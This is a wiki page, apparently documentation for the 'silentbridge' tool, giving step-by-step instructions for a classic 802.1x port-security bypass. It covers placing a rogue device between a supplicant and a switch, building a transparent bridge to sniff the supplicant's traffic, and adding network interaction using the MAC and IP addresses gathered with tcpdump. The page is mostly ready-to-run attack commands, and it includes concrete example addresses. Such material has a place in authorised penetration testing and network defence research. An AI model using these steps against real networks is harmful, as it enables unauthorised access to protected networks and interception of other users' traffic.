-
Notifications
You must be signed in to change notification settings - Fork 40
Classic 802.1x Bypass
Effective against: 802.1x-2004, 802.1x-2001
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001 using either Device Configuration A or Device Configuration B.
Begin connecting your rogue device between the supplicant and authenticator as described in Device Placement.
Then, connect to your device using your side channel (see: Software Setup).
If you are using Device Configuration B, make sure both splitters are in the "connect" position by running the --splitterctl command:
skip this if you are not using Device Configuration B
./silentbridge --splitterctl --upstream-splitter connect --phy-splitter connect
Next, use the --create-bridge command to create a simple transparent bridge:
substitute eno1, eno2, and eno3 for the names of your upstream, PHY, and sidechannel interfaces
./silentbridge --create-bridge --upstream eno1 --phy eno2--sidechannel eno3
That's it - you've just bypassed port security. You should be able to sniff traffic traveling to and from the supplicant.
Now that we've performed our initial bypass, let's give ourselves the capability to interact with devices on the network.
First, use tcpdump to gather the following data points:
- MAC address of default gateway
- IP address of supplicant
- MAC address of supplicant
- MAC address of switch
Then, use the --add-interaction flag to add network interaction to your bridge:
replace the interface names, IPs, and MAC addresses below with the data gathered using tcpdump
./silentbridge --add-interaction --gw-mac d0:17:c2:3f:af:e0 --client-ip 192.168.1.81 --upstream eno1 --client-mac 38:60:32:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:09:85 --sidechannel eno3
Congrats - you can now interact with anything on the network except the supplicant.